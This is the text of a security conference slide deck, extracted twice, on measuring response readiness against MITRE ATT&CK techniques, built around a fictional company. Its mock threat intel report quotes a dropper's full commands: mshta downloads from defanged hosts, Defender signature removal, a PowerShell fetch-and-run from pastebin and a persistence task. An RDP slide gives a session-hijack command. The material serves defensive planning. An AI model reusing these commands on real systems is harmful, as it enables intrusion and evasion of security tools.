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How to measure your security response readiness?
Tomasz Jakubowski
Lockheed Martin Cyber Kill Chain® - recap
Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform
Recon Weaponization Delivery Exploitation Installation C&C Actions on objectives
Detection vs Closure
Detected Closed
Close the gap
• Website: https://attack.mitre.org
• Quote:
“MITRE ATT&CK™ is a globally-accessible knowledge base of
adversary tactics and techniques based on real-world observations.
The ATT&CK knowledge base is used as a foundation for the
development of specific threat models and methodologies in the
private sector, in government, and in the cybersecurity product and
service community.”
Tactics Techniques
• Answers WHY an action is performed by an
• Provide useful context to individual techniques
• Answers HOW an adversary achieves a tactical
objective by performing an action (e.g. send
spearphising email with an attachment to gain
initial foothold)
• Useful information for both red and blue teams
Tactics Techniques
• Answers WHY an action is performed by an
• Provide useful context to individual techniques
• Answers HOW an adversary achieves a tactical
objective by performing an action (e.g. send
spearphising email with an attachment to gain
initial foothold)
• Useful information for both red and blue teams
Source: https://attack.mitre.org/theme/images/enterprise-pre-lifecycle.png
How to measure your security response readiness?
What is described
• Tactics (E: 12)
• Techniques (E: 266)
• Description
• Examples: Groups and/or software using this
• Mitigation
• Detection
• References
• Groups (94)
• Description
• Aliases
• Techniques used
• Software used
• References
• Software (414)
• Description
• Techniques used
• Groups using it
• References
There are just
too many
eg. Industry > Groups > Techniques
MITRE ATT&CK™ toolset
• MITRE ATT&CK™ Navigator
The “Target”
• Fictional company (or maybe not)
• Provides services available online
• AI constructs – they just live in cyberspace
• it’s critical for them to be online!
• Construct – a copy of consciousness allowing for immortal life
in cyberspace
• Keeps confidential data on their internal network
• You don’t want people breaking in and making copies of
customers’ constructs
On Host:
- FW
- AV
Warm-up: Detection and Containment
Phase Detect Deny Disrupt Degrade Deceive Contain
Reconnaissance Firewall Honeypot
Weaponization NIPS
Exploitation AV
Command & Control AV
Actions on Targets
Completed: Detection and Containment
Phase Detect Deny Disrupt Degrade Deceive Contain
Reconnaissance Web Analytics
Web logs
Router Logs
Firewall Honeypot
Redirect Loop
Redirect Loops
Weaponization NIDS NIPS NIPS
Delivery NIDS
Web Filter
Mail Filter
Inline AV
Mail Filter
Web Filter
Combination of
Honeypot App-Aware Firewall
Exploitation HIDS
Highly restricted User
Honeypot Inter-Zone NIPS
Installation HIDS
Application Logs
App Whitelisting
Blocked Execution
Combination of
Command & Control NIDS
DNS Redirect
Actions on Targets Audit Logs
Network Segmentation
Network Segmentation
Network Segmentation Honeypot
Scenario 1: OMG! New vulnerability
• CVE-2029-0708 – Online Surrogate Service Remote Code Execution
• A remote code execution vulnerability exists in Online Surrogate Services when an unauthenticated attacker
connects to the target system using RDP and sends specially crafted requests. This vulnerability requires no
user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the
target surrogate that can lead to complete takeover of the surrogate.
• To exploit this vulnerability, an attacker would need to send a specially crafted request to the target
surrogate Online Surrogate Service via RDP.
• The update addresses the vulnerability by correcting how Online Surrogate Services handles connection
• You’ve checked – you have an old version of the software and you can’t patch right now due to some other
dependencies that need to be sorted out first
Proof of
Exploited Latest Software
Older Software
Denial of
Yes Yes Yes 4 – Not affected 1 – Exploitation
More Likely
Source: https://mitre-attack.github.io/attack-navigator/enterprise/
T1076: Remote Desktop Protocol
• Mitigation
• Disable the RDP service if it is unnecessary,
• remove unnecessary accounts and groups from Remote Desktop Users groups,
• enable firewall rules to block RDP traffic between network security zones,
• Audit the Remote Desktop Users group membership regularly,
• Remove the local Administrators group from the list of groups allowed to log in through RDP,
• Limit remote user permissions if remote access is necessary,
• Use remote desktop gateways and multifactor authentication for remote logins,
• Do not leave RDP accessible from the internet,
• Change GPOs to define shorter timeouts sessions and maximum amount of time any single session can be active,
• Change GPOs to specify the maximum amount of time that a disconnected session stays active on the RD session host server,
• Detection
• Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity
that occurs after a remote login, may indicate suspicious or malicious behavior with RDP,
• Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short
period of time.
• set up process monitoring for tscon.exe usage and monitor service creation that uses cmd.exe /k or cmd.exe /c in its arguments to prevent RDP
session hijacking (e.g.: sc create sesshijack binpath= “cmd.exe /k tscon 4 /dest:console” and then: net start sesshijack)
Groups using it: 16 Software using it: 8
• Multi-Stage Backdoor Dropper Document Possibly
Targeting Online Services Vendors Observed
• 1st stage: Dropper Document after enabling VBA macros executes mshta.exe with the following command line: mshta.exe
• The referenced TinyURL address redirects to https://www.faild2ptch[.]com/oh/no.html, which provides URL-escaped
JavaScript (JS) that performs the following actions:
1. Removes OS Defender dynamic signatures using the following command line: MpCmdRun.exe-removedefinitions- dynamicsignatures
2. Kills all open Office applications using the following command line: taskkill /f /im winword.exe & taskkill /f /im excel.exe &
taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE
3. Kills the OS Defender notification process using the command line: taskkill /f /im MSASCuiL.exe
4. Disables unsafe files being opened in protected view by writing to one of the following registry paths:
5. Downloads and executes a remotely hosted .NET PE https://pastebin[.]com/raw/dhVymUy3 using PowerShell executed by mshta.exe
with the following command line: mshta.exe vbscript:CreateObject(Wscript.Shell).Run(powershell.exe -noexit -
command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-
6. Creates a registry run key under HKCUSoftwareMicrosoftWindowsCurrentVersionRunMicrosoftUpdate with the following
command line to execute a scheduled task every 100 minutes to download and execute a remote payload using mshta.exe: schtasks
/create /sc MINUTE /mo 100 /tn "eScan Backup" /tr "mshta
https://pastebin[.]com/raw/df861P8c",0,true)(window.close)"" /F
Scenario 2: Threat Intel Report
• Multi-Stage Backdoor Dropper Document Possibly
Targeting Online Services Vendors Observed
• 1st stage: Dropper Document after enabling VBA macros executes mshta.exe with the following command line: mshta.exe
• The referenced TinyURL address redirects to https://www.faild2ptch[.]com/oh/no.html, which provides URL-escaped
JavaScript (JS) that performs the following actions:
1. Removes OS Defender dynamic signatures using the following command line: MpCmdRun.exe-removedefinitions- dynamicsignatures
2. Kills all open Office applications using the following command line: taskkill /f /im winword.exe & taskkill /f /im excel.exe &
taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE
3. Kills the OS Defender notification process using the command line: taskkill /f /im MSASCuiL.exe
4. Disables unsafe files being opened in protected view by writing to one of the following registry paths:
5. Downloads and executes a remotely hosted .NET PE https://pastebin[.]com/raw/dhVymUy3 using PowerShell executed by mshta.exe
with the following command line: mshta.exe vbscript:CreateObject(Wscript.Shell).Run(powershell.exe -noexit -
command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-
6. Creates a registry run key under HKCUSoftwareMicrosoftWindowsCurrentVersionRunMicrosoftUpdate with the following
command line to execute a scheduled task every 100 minutes to download and execute a remote payload using mshta.exe: schtasks
/create /sc MINUTE /mo 100 /tn "eScan Backup" /tr "mshta
https://pastebin[.]com/raw/df861P8c",0,true)(window.close)"" /F
Scenario 2: Threat Intel Report
Security Tools
Web Service
Scheduled Task
Files or
Modify Registry
How to measure your security response readiness?
0 = We do nothing
1 = Locally logged
Relevant data is captured on the endpoint
2 = Centrally logged
Data is gathered centrally
4 = Alerting
We have rules to detect anomalies, suspicious events
5 = Playbook exists
A process to respond exists (incl. analyse, contain, eradicate, recover)
6 = Response is automated
We have automated response for this alert
3 = Correlated / enriched
Logs for the event are enriched with data from other sources to increase fidelity
6 = Response is automated
5 = Playbook exists
4 = Alerting
3 = Correlated / enriched
2 = Centrally logged
1 = Locally logged
0 = We do nothing
Scenario 3: It’s all about the money
• There is an ongoing trade war between 2 biggest economies in the world
• Unfortunately this has an impact on the wealthiest people who are
Sense//Net Library’s customers
• Few of them decided to put their AI constructs to sleep until better times
come hence your profits decrease
• The management decided it’s time to cut costs and your department needs
to participate
• You don’t want to cut people – they are a great team – so you focus on
vendor contracts that are going to be renewed this year – which security
control can you afford to get rid of?
Measure effectiveness of the toolset
MITRE ATT&CK techniques
Early warning Inbound Protect Detect Outbound Protect
Reconnaisance Weaponization, Delivery Weaponization, Delivery, C2 Exploit, Installation, C2, AOO
T1193: Spearphishing Attachment
T1089: Disabling Security Tools
T1112: Modify Registry
T1086: PowerShell
T1053: Scheduled Task
Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform
[2] Would Warn of Activity
[0] N/A
[2] Would Block Activity
[1] Could Block Activity
[0] Would Not Block Activity
[2] Would Detect Activity
[0] No Detection or N/A
[2] Would Block Outbound Traffic
[1] Could Have Blocked
[0] Would Not Block Activity
Measure effectiveness of the toolset
MITRE ATT&CK techniques
Toolset measure
Early warning Inbound Protect Detect Outbound Protect
Reconnaisance Weaponization, Delivery Weaponization, Delivery, C2 Exploit, Installation, C2, AOO
Current Proposed
T1193: Spearphishing Attachment 0 0 2 1 2 0 2 1 8 7
T1089: Disabling Security Tools 2 0 0 2 2 0 2 1 9 8
T1112: Modify Registry 0 0 2 1 2 0 2 1 8 7
T1086: PowerShell 2 0 0 2 2 0 2 1 9 8
T1053: Scheduled Task 2 0 2 1 0 2 2 1 10 7
44 37
100% 84%
Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform
[2] Would Warn of Activity
[0] N/A
[2] Would Block Activity
[1] Could Block Activity
[0] Would Not Block Activity
[2] Would Detect Activity
[0] No Detection or N/A
[2] Would Block Outbound Traffic
[1] Could Have Blocked
[0] Would Not Block Activity
Scenario 4: Let’s go shopping
• Times are changing and the company profits picked up
• You successfully argued to get a bigger budget and now you can
spend some money on a new security control
• Your team shortlisted a few vendors and you’ve conducted a PoC
• The results are that there a few differences in the products
• The procurement team negotiated almost similar prices for the
Measure effectiveness of the toolset
MITRE ATT&CK techniques
Current Future
Toolset measure
Early warning Inbound Protect Detect Outbound Protect
Reconnaisance Weaponization, Delivery
Weaponization, Delivery,
Exploit, Installation, C2,
T1193: Spearphishing Attachment 0 2 1 2 2 2 0 7 9 7
T1089: Disabling Security Tools 2 0 2 2 2 0 2 8 8 10
T1112: Modify Registry 0 2 1 2 2 2 0 7 9 7
T1086: PowerShell 2 0 2 2 2 0 0 8 8 8
T1053: Scheduled Task 2 2 1 0 2 2 0 7 9 7
37 43 39
100% 116% 105%
44 43 39
100% 98% 89%
Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform
[2] Would Warn of Activity
[0] N/A
[2] Would Block Activity
[1] Could Block Activity
[0] Would Not Block Activity
[2] Would Detect Activity
[0] No Detection or N/A
[2] Would Block Outbound Traffic
[1] Could Have Blocked
[0] Would Not Block Activity
[2] Proposal Applicable
[0] N/A
Previous compared to
Proposed A and B
Other use cases
Putting it all
Vulnerability reports
Threat Intel reports
Toolset effectiveness
Response maturity

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How to measure your security response readiness?

  • 1. How to measure your security response readiness? Tomasz Jakubowski @perunhimself tomasz@shellsquad.com
  • 2. Lockheed Martin Cyber Kill Chain® - recap Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform https://www.lockheedmartin.com/content/dam/lockheed- martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
  • 3. 0 10 20 30 40 50 60 Recon Weaponization Delivery Exploitation Installation C&C Actions on objectives Detection vs Closure Detected Closed Close the gap
  • 4. MITRE ATT&CK ™ • Website: https://attack.mitre.org • Quote: “MITRE ATT&CK™ is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community.”
  • 5. MITRE ATT&CK ™ Tactics Techniques • Answers WHY an action is performed by an adversary • Provide useful context to individual techniques • Answers HOW an adversary achieves a tactical objective by performing an action (e.g. send spearphising email with an attachment to gain initial foothold) • Useful information for both red and blue teams MITRE ATT&CK ™ Tactics Techniques • Answers WHY an action is performed by an adversary • Provide useful context to individual techniques • Answers HOW an adversary achieves a tactical objective by performing an action (e.g. send spearphising email with an attachment to gain initial foothold) • Useful information for both red and blue teams
  • 6. MITRE ATT&CK ™ Source: https://attack.mitre.org/theme/images/enterprise-pre-lifecycle.png
  • 8. What is described • Tactics (E: 12) • Techniques (E: 266) • Description • Examples: Groups and/or software using this technique • Mitigation • Detection • References • Groups (94) • Description • Aliases • Techniques used • Software used • References • Software (414) • Description • Techniques used • Groups using it • References
  • 9. There are just too many techniques! Shortlist! eg. Industry > Groups > Techniques
  • 10. MITRE ATT&CK™ toolset • MITRE ATT&CK™ Navigator https://mitre-attack.github.io/attack-navigator/enterprise/
  • 11. The “Target” • Fictional company (or maybe not) https://www.sensenet-library.com • Provides services available online • AI constructs – they just live in cyberspace • it’s critical for them to be online! • Construct – a copy of consciousness allowing for immortal life in cyberspace • Keeps confidential data on their internal network • You don’t want people breaking in and making copies of customers’ constructs
  • 13. Warm-up: Detection and Containment Phase Detect Deny Disrupt Degrade Deceive Contain Reconnaissance Firewall Honeypot Weaponization NIPS Delivery Exploitation AV Installation Command & Control AV Actions on Targets LMCyberKillChain® Countermeasures
  • 14. Completed: Detection and Containment Phase Detect Deny Disrupt Degrade Deceive Contain Reconnaissance Web Analytics Web logs Router Logs NIDS Firewall Honeypot Redirect Loop Honeypot Redirect Loops Firewall Weaponization NIDS NIPS NIPS Delivery NIDS HIDS AV Web Filter Mail Filter Inline AV Mail Filter Web Filter Queuing Sinkhole Combination of Deny/Disrupt Honeypot App-Aware Firewall Honeypot Exploitation HIDS NIDS AV Patch AV HIPS Patch AV HIPS Highly restricted User Accounts Honeypot Inter-Zone NIPS Installation HIDS Application Logs AV NetFlow App Whitelisting Blocked Execution AV HIPS Combination of Deny/Disrupt Honeypot Command & Control NIDS HIDS AV Firewall Sinkhole NIPS DEP Sinkhole Tarpit Sinkhole DNS Redirect Sinkhole Actions on Targets Audit Logs DEP AV NIDS HIDS Firewall Network Segmentation DLP Network Segmentation HIPS Network Segmentation Honeypot LMCyberKillChain® Countermeasures
  • 15. Scenario 1: OMG! New vulnerability • CVE-2029-0708 – Online Surrogate Service Remote Code Execution • A remote code execution vulnerability exists in Online Surrogate Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target surrogate that can lead to complete takeover of the surrogate. • To exploit this vulnerability, an attacker would need to send a specially crafted request to the target surrogate Online Surrogate Service via RDP. • The update addresses the vulnerability by correcting how Online Surrogate Services handles connection requests. • You’ve checked – you have an old version of the software and you can’t patch right now due to some other dependencies that need to be sorted out first Publicly Disclosed Proof of Concept Exploited Latest Software Release Older Software Release Denial of Service Yes Yes Yes 4 – Not affected 1 – Exploitation More Likely No
  • 17. T1076: Remote Desktop Protocol • Mitigation • Disable the RDP service if it is unnecessary, • remove unnecessary accounts and groups from Remote Desktop Users groups, • enable firewall rules to block RDP traffic between network security zones, • Audit the Remote Desktop Users group membership regularly, • Remove the local Administrators group from the list of groups allowed to log in through RDP, • Limit remote user permissions if remote access is necessary, • Use remote desktop gateways and multifactor authentication for remote logins, • Do not leave RDP accessible from the internet, • Change GPOs to define shorter timeouts sessions and maximum amount of time any single session can be active, • Change GPOs to specify the maximum amount of time that a disconnected session stays active on the RD session host server, • Detection • Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP, • Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. • set up process monitoring for tscon.exe usage and monitor service creation that uses cmd.exe /k or cmd.exe /c in its arguments to prevent RDP session hijacking (e.g.: sc create sesshijack binpath= “cmd.exe /k tscon 4 /dest:console” and then: net start sesshijack) https://attack.mitre.org/techniques/T1076/ Groups using it: 16 Software using it: 8
  • 18. • Multi-Stage Backdoor Dropper Document Possibly Targeting Online Services Vendors Observed • 1st stage: Dropper Document after enabling VBA macros executes mshta.exe with the following command line: mshta.exe http://www.tinyurl[.]com/shlsqd • The referenced TinyURL address redirects to https://www.faild2ptch[.]com/oh/no.html, which provides URL-escaped JavaScript (JS) that performs the following actions: 1. Removes OS Defender dynamic signatures using the following command line: MpCmdRun.exe-removedefinitions- dynamicsignatures 2. Kills all open Office applications using the following command line: taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE 3. Kills the OS Defender notification process using the command line: taskkill /f /im MSASCuiL.exe 4. Disables unsafe files being opened in protected view by writing to one of the following registry paths: HKCUSoftwareMicrosoftOffice[11- 16].0[Excel|Word|PowerPoint]SecurityProtectedViewDisableUnsafeLocationsInPV 5. Downloads and executes a remotely hosted .NET PE https://pastebin[.]com/raw/dhVymUy3 using PowerShell executed by mshta.exe with the following command line: mshta.exe vbscript:CreateObject(Wscript.Shell).Run(powershell.exe -noexit - command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New- ObjectNet.WebClient).DownloadString('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m (window.close) 6. Creates a registry run key under HKCUSoftwareMicrosoftWindowsCurrentVersionRunMicrosoftUpdate with the following command line to execute a scheduled task every 100 minutes to download and execute a remote payload using mshta.exe: schtasks /create /sc MINUTE /mo 100 /tn "eScan Backup" /tr "mshta vbscript:CreateObject("Wscript.Shell").Run("mshta.exe https://pastebin[.]com/raw/df861P8c",0,true)(window.close)"" /F Scenario 2: Threat Intel Report
  • 19. • Multi-Stage Backdoor Dropper Document Possibly Targeting Online Services Vendors Observed • 1st stage: Dropper Document after enabling VBA macros executes mshta.exe with the following command line: mshta.exe http://www.tinyurl[.]com/shlsqd • The referenced TinyURL address redirects to https://www.faild2ptch[.]com/oh/no.html, which provides URL-escaped JavaScript (JS) that performs the following actions: 1. Removes OS Defender dynamic signatures using the following command line: MpCmdRun.exe-removedefinitions- dynamicsignatures 2. Kills all open Office applications using the following command line: taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE 3. Kills the OS Defender notification process using the command line: taskkill /f /im MSASCuiL.exe 4. Disables unsafe files being opened in protected view by writing to one of the following registry paths: HKCUSoftwareMicrosoftOffice[11- 16].0[Excel|Word|PowerPoint]SecurityProtectedViewDisableUnsafeLocationsInPV 5. Downloads and executes a remotely hosted .NET PE https://pastebin[.]com/raw/dhVymUy3 using PowerShell executed by mshta.exe with the following command line: mshta.exe vbscript:CreateObject(Wscript.Shell).Run(powershell.exe -noexit - command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New- ObjectNet.WebClient).DownloadString('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m (window.close) 6. Creates a registry run key under HKCUSoftwareMicrosoftWindowsCurrentVersionRunMicrosoftUpdate with the following command line to execute a scheduled task every 100 minutes to download and execute a remote payload using mshta.exe: schtasks /create /sc MINUTE /mo 100 /tn "eScan Backup" /tr "mshta vbscript:CreateObject("Wscript.Shell").Run("mshta.exe https://pastebin[.]com/raw/df861P8c",0,true)(window.close)"" /F Scenario 2: Threat Intel Report T1193: Spearphishing Attachment T1089: Disabling Security Tools T1170: MshtaT1481: Web Service T1053: Scheduled Task T1027: Obfuscated Files or Information T1064: Scripting T1086: PowerShell T1112: Modify Registry
  • 21. Maturity 0 = We do nothing 1 = Locally logged Relevant data is captured on the endpoint 2 = Centrally logged Data is gathered centrally 4 = Alerting We have rules to detect anomalies, suspicious events 5 = Playbook exists A process to respond exists (incl. analyse, contain, eradicate, recover) 6 = Response is automated We have automated response for this alert 3 = Correlated / enriched Logs for the event are enriched with data from other sources to increase fidelity
  • 22. 6 = Response is automated 5 = Playbook exists 4 = Alerting 3 = Correlated / enriched 2 = Centrally logged 1 = Locally logged 0 = We do nothing
  • 23. Scenario 3: It’s all about the money • There is an ongoing trade war between 2 biggest economies in the world • Unfortunately this has an impact on the wealthiest people who are Sense//Net Library’s customers • Few of them decided to put their AI constructs to sleep until better times come hence your profits decrease • The management decided it’s time to cut costs and your department needs to participate • You don’t want to cut people – they are a great team – so you focus on vendor contracts that are going to be renewed this year – which security control can you afford to get rid of?
  • 24. Measure effectiveness of the toolset MITRE ATT&CK techniques Current Early warning Inbound Protect Detect Outbound Protect Reconnaisance Weaponization, Delivery Weaponization, Delivery, C2 Exploit, Installation, C2, AOO Tool1 Tool2 Tool3 Tool4 Tool5 Tool6 Tool7 Tool8 T1193: Spearphishing Attachment T1089: Disabling Security Tools T1112: Modify Registry T1086: PowerShell T1053: Scheduled Task Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf [2] Would Warn of Activity [0] N/A [2] Would Block Activity [1] Could Block Activity [0] Would Not Block Activity [2] Would Detect Activity [0] No Detection or N/A [2] Would Block Outbound Traffic [1] Could Have Blocked [0] Would Not Block Activity Shortlisted Techniques
  • 25. Measure effectiveness of the toolset MITRE ATT&CK techniques Current Toolset measure Early warning Inbound Protect Detect Outbound Protect Reconnaisance Weaponization, Delivery Weaponization, Delivery, C2 Exploit, Installation, C2, AOO Tool1 Tool2 Tool3 Tool4 Tool5 Tool6 Tool7 Tool8 Current Proposed T1193: Spearphishing Attachment 0 0 2 1 2 0 2 1 8 7 T1089: Disabling Security Tools 2 0 0 2 2 0 2 1 9 8 T1112: Modify Registry 0 0 2 1 2 0 2 1 8 7 T1086: PowerShell 2 0 0 2 2 0 2 1 9 8 T1053: Scheduled Task 2 0 2 1 0 2 2 1 10 7 44 37 100% 84% Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf [2] Would Warn of Activity [0] N/A [2] Would Block Activity [1] Could Block Activity [0] Would Not Block Activity [2] Would Detect Activity [0] No Detection or N/A [2] Would Block Outbound Traffic [1] Could Have Blocked [0] Would Not Block Activity
  • 26. Scenario 4: Let’s go shopping • Times are changing and the company profits picked up • You successfully argued to get a bigger budget and now you can spend some money on a new security control • Your team shortlisted a few vendors and you’ve conducted a PoC • The results are that there a few differences in the products • The procurement team negotiated almost similar prices for the products
  • 27. Measure effectiveness of the toolset MITRE ATT&CK techniques Current Future Toolset measure Early warning Inbound Protect Detect Outbound Protect Proposed Reconnaisance Weaponization, Delivery Weaponization, Delivery, C2 Exploit, Installation, C2, AOO Tool1 Tool2 Tool3 Tool4 Tool5 Tool6 Tool7 Tool8 ToolA ToolB Current ProposedA ProposedB T1193: Spearphishing Attachment 0 2 1 2 2 2 0 7 9 7 T1089: Disabling Security Tools 2 0 2 2 2 0 2 8 8 10 T1112: Modify Registry 0 2 1 2 2 2 0 7 9 7 T1086: PowerShell 2 0 2 2 2 0 0 8 8 8 T1053: Scheduled Task 2 2 1 0 2 2 0 7 9 7 37 43 39 100% 116% 105% 44 43 39 100% 98% 89% Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf [2] Would Warn of Activity [0] N/A [2] Would Block Activity [1] Could Block Activity [0] Would Not Block Activity [2] Would Detect Activity [0] No Detection or N/A [2] Would Block Outbound Traffic [1] Could Have Blocked [0] Would Not Block Activity [2] Proposal Applicable [0] N/A Previous compared to Proposed A and B
  • 29. Putting it all together Vulnerability reports Threat Intel reports Toolset effectiveness Response maturity ...